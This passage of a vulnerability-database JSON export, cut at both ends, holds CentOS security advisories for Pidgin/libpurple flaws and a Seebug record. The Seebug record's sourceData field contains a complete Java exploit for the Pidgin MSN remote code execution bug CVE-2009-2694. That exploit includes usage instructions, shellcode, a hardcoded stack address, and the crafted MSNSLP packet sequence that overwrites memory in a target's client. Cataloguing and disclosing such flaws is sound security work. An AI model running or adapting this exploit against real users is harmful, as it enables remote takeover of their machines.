"libpurple-tcl-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-4.el3", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-4.el3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-4.el3", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-4.el3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2009:1218\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016099.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016100.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016101.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016102.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1218.html", "edition": 1, "reporter": "CentOS Project", "published": "2009-08-18T20:24:05", "title": "finch, libpurple, pidgin security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "modified": "2009-08-19T10:20:15", "href": "http://lists.centos.org/pipermail/centos-announce/2009-August/016099.html", "id": "CESA-2009:1218", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:12", "references": ["http://pasi.pirhonen.eu/", "https://rhn.redhat.com/errata/RHSA-2009-1059.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-3.el3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "s390x", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-3.el3.s390x.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "s390", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-3.el3.s390.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-3.el3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-3.el3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "any", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-3.el3.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "ia64", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-3.el3.ia64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2009:1059\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015889.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015890.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015933.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015935.html\n\n**Affected packages:**\npidgin\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1059.html", "edition": 1, "reporter": "CentOS Project", "published": "2009-05-22T15:04:17", "title": "pidgin security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "modified": "2009-05-25T16:35:42", "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/015889.html", "id": "CESA-2009:1059", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:26:08", "references": ["http://pasi.pirhonen.eu/", "https://rhn.redhat.com/errata/RHSA-2009-1060.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "finch-2.5.5-3.el5.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "finch-2.5.5-3.el5.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "pidgin-devel-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin-devel", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-tcl-2.5.5-3.el5.i386.rpm", "packageName": "libpurple-tcl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "libpurple-perl-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-perl", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-perl-2.5.5-3.el5.i386.rpm", "packageName": "libpurple-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "finch-2.5.5-2.el4.ia64.rpm", "packageName": "finch", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "finch-devel-2.5.5-2.el4.ia64.rpm", "packageName": "finch-devel", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "pidgin-perl-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin-perl", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "libpurple-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-perl-2.5.5-3.el5.x86_64.rpm", "packageName": "libpurple-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-2.5.5-3.el5.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-2.5.5-3.el5.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-devel-2.5.5-3.el5.x86_64.rpm", "packageName": "pidgin-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-2.5.5-3.el5.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-2.5.5-3.el5.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "finch-2.5.5-3.el5.x86_64.rpm", "packageName": "finch", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-devel-2.5.5-3.el5.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-devel-2.5.5-3.el5.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "libpurple-devel-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-devel", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-2.5.5-3.el5.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-2.5.5-3.el5.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-2.5.5-3.el5.x86_64.rpm", "packageName": "libpurple", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-perl-2.5.5-3.el5.i386.rpm", "packageName": "pidgin-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-2.5.5-3.el5.x86_64.rpm", "packageName": "pidgin", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-perl-2.5.5-3.el5.x86_64.rpm", "packageName": "pidgin-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "libpurple-tcl-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-tcl", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-devel-2.5.5-3.el5.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "pidgin-devel-2.5.5-3.el5.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-devel-2.5.5-3.el5.x86_64.rpm", "packageName": "libpurple-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "libpurple-tcl-2.5.5-3.el5.x86_64.rpm", "packageName": "libpurple-tcl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "finch-devel-2.5.5-3.el5.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "finch-devel-2.5.5-3.el5.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "packageFilename": "pidgin-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin", "arch": "ia64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "packageFilename": "finch-devel-2.5.5-3.el5.x86_64.rpm", "packageName": "finch-devel", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2009:1060\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015891.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015892.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015937.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1060.html", "edition": 1, "reporter": "CentOS Project", "published": "2009-05-22T22:24:35", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "finch, libpurple, pidgin security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-05-25T17:36:05", "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/015891.html", "id": "CESA-2009:1060", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:37:23", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2009-09-11T00:00:00", "title": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-09-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12249", "id": "SSV:12249", "sourceData": "\n /*\r\n* Pidgin MSN <= 2.5.8 Remote Code Execution\r\n*\r\n* Pierre Nogues - pierz@hotmail.it\r\n* http://www.indahax.com/\r\n*\r\n*\r\n* Description:\r\n* Pidgin is a multi-protocol Instant Messenger.\r\n*\r\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\r\n* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets\r\n* which could lead to memory corruption.\r\n*\r\n* Affected versions :\r\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\r\n*\r\n* Plateforms :\r\n* Windows, Linux, Mac\r\n*\r\n* Fix :\r\n* Fixed in Pidgin 2.5.9\r\n* Update to the latest version : http://www.pidgin.im/download/\r\n*\r\n* References :\r\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\r\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\r\n* [3] http://www.pidgin.im/news/security/?id=34\r\n*\r\n* Usage :\r\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\r\n* javac.exe -cp "%classpath%;.\\jml-1.0b3-full.jar" PidginExploit.java\r\n* java -cp "%classpath%;.\\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\r\n*\r\n*/\r\n\r\nimport net.sf.jml.*;\r\nimport net.sf.jml.event.*;\r\nimport net.sf.jml.impl.*;\r\nimport net.sf.jml.message.p2p.*;\r\nimport net.sf.jml.util.*;\r\n\r\npublic class PidginExploit {\r\n\r\n private MsnMessenger messenger;\r\n private String login;\r\n private String password;\r\n private String target;\r\n\r\n private int session_id = NumberUtils.getIntRandom();\r\n\r\n private byte shellcode[] = new byte[] {\r\n\r\n /*\r\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\r\n * sub esp,500\r\n */\r\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\r\n\r\n\r\n /*\r\n * windows/exec - 121 bytes\r\n * http://www.metasploit.com\r\n * EXITFUNC=process, CMD=calc.exe\r\n */\r\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\r\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\r\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\r\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\r\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\r\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\r\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\r\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\r\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\r\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\r\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\r\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\r\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\r\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\r\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\r\n (byte) 0x00\r\n };\r\n\r\n // reteip = pointer to the return address in the stack\r\n // The shellcode will be wrote just before reteip\r\n // and reteip will automaticly point to the shellcode. It's magic !\r\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\r\n\r\n private int neweip;\r\n private byte[] payload = new byte[shellcode.length + 4];\r\n private int totallength = reteip + 4;\r\n\r\n public static void main(String[] args) throws Exception {\r\n\r\n if(args.length != 3){\r\n System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");\r\n }else{\r\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\r\n exploit.start();\r\n }\r\n\r\n }\r\n\r\n public PidginExploit(String login, String password, String target){\r\n this.login = login;\r\n this.password = password;\r\n this.target = target;\r\n\r\n neweip = reteip - shellcode.length ;\r\n\r\n for(int i=0;i<shellcode.length;i++)\r\n payload[i] = shellcode[i];\r\n\r\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\r\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\r\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\r\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\r\n }\r\n\r\n public void start() {\r\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\r\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\r\n\r\n messenger.setLogIncoming(false);\r\n messenger.setLogOutgoing(false);\r\n\r\n initMessenger(messenger);\r\n messenger.login();\r\n }\r\n\r\n protected void initMessenger(MsnMessenger messenger) {\r\n\r\n messenger.addContactListListener(new MsnContactListAdapter() {\r\n\r\n public void contactListInitCompleted(MsnMessenger messenger) {\r\n\r\n final Object id = new Object();\r\n\r\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\r\n\r\n public void switchboardStarted(MsnSwitchboard switchboard) {\r\n\r\n if (id != switchboard.getAttachment())\r\n return;\r\n\r\n switchboard.inviteContact(Email.parseStr(target));\r\n }\r\n\r\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\r\n if (id != switchboard.getAttachment())\r\n return;\r\n\r\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\r\n msg.setIdentifier(NumberUtils.getIntRandom());\r\n msg.setSessionId(session_id);\r\n msg.setOffset(0);\r\n msg.setTotalLength(totallength);\r\n msg.setCurrentLength(totallength);\r\n\r\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\r\n // We'll use this buffer to rewrite memory in the stack\r\n msg.setFlag(0x1000020);\r\n\r\n msg.setP2PDest(target);\r\n\r\n switchboard.sendMessage(msg);\r\n\r\n System.out.println("First packet sent, waiting for the ACK");\r\n\r\n }\r\n\r\n public void switchboardClosed(MsnSwitchboard switchboard) {\r\n System.out.println("switchboardClosed");\r\n switchboard.getMessenger().removeSwitchboardListener(this);\r\n }\r\n\r\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\r\n System.out.println("contactLeaveSwitchboard");\r\n }\r\n });\r\n messenger.newSwitchboard(id);\r\n }\r\n });\r\n\r\n messenger.addMessageListener(new MsnMessageAdapter(){\r\n\r\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\r\n\r\n //We receive the ACK of our first packet with the ID of the new bogus packet\r\n message.getIdentifier();\r\n\r\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\r\n payload.length, payload, target);\r\n\r\n switchboard.sendMessage(msg);\r\n System.out.println("ACK received && Payload sent !");\r\n System.out.println("Exploit OK ! CTRL+C to quit");\r\n\r\n }\r\n });\r\n\r\n\r\n\r\n messenger.addMessengerListener(new MsnMessengerAdapter() {\r\n\r\n public void loginCompleted(MsnMessenger messenger) {\r\n System.out.println(messenger.getOwner().getEmail() + " login");\r\n }\r\n\r\n public void logout(MsnMessenger messenger) {\r\n System.out.println(messenger.getOwner().getEmail() + " logout");\r\n }\r\n\r\n public void exceptionCaught(MsnMessenger messenger,\r\n Throwable throwable) {\r\n System.out.println("caught exception: " + throwable);\r\n }\r\n });\r\n\r\n }\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12249", "status": "poc"}, {"lastseen": "2017-11-19T21:19:36", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE(CAN) ID: CVE-2009-2694\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002 \r\n\r\nPidgin\u548c\u5176\u4ed6\u4e00\u4e9b\u5373\u65f6\u6d88\u606f\u5ba2\u6237\u7aef\u6240\u4f7f\u7528\u7684Libpurple\u5e93\u4e2d\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5411\u804a\u5929\u5ba2\u6237\u7aef\u53d1\u9001\u7279\u5236\u7684MSNSLP\u62a5\u6587\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\u653b\u51fb\u9700\u8981\u53d1\u9001\u4e24\u4e2a\u8fde\u7eed\u7684MSNSLP\u6d88\u606f\uff0c\u7b2c\u4e00\u4e2a\u7528\u4e8e\u5bf9slpmsg\u5b58\u50a8\u4f1a\u8bddid\uff0c\u7b2c\u4e8c\u4e2a\u7528\u4e8e\u89e6\u53d1\u6f0f\u6d1e\uff0c\u6700\u7ec8\u76ee\u6807\u662f\u5230\u8fbemsn_slplink_process_msg()\u4e2d\u7684memcpy()\u8c03\u7528\u3002\u9700\u8981\u521b\u5efa\u504f\u79fb\u4e3a\u975e0\u7684MSNSLP\u6d88\u606f\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u503c\u662fmemcpy()\u7684\u76ee\u6807\u3002\r\n\r\n\u56e0\u4e3a\u504f\u79fb\u975e0\uff0c\u6240\u4ee5\u5728\u8c03\u7528msn_slplink_message_find()\u8fd4\u56deNULL\u65f6\u4f1a\u51fa\u73b0\u7b2c\u4e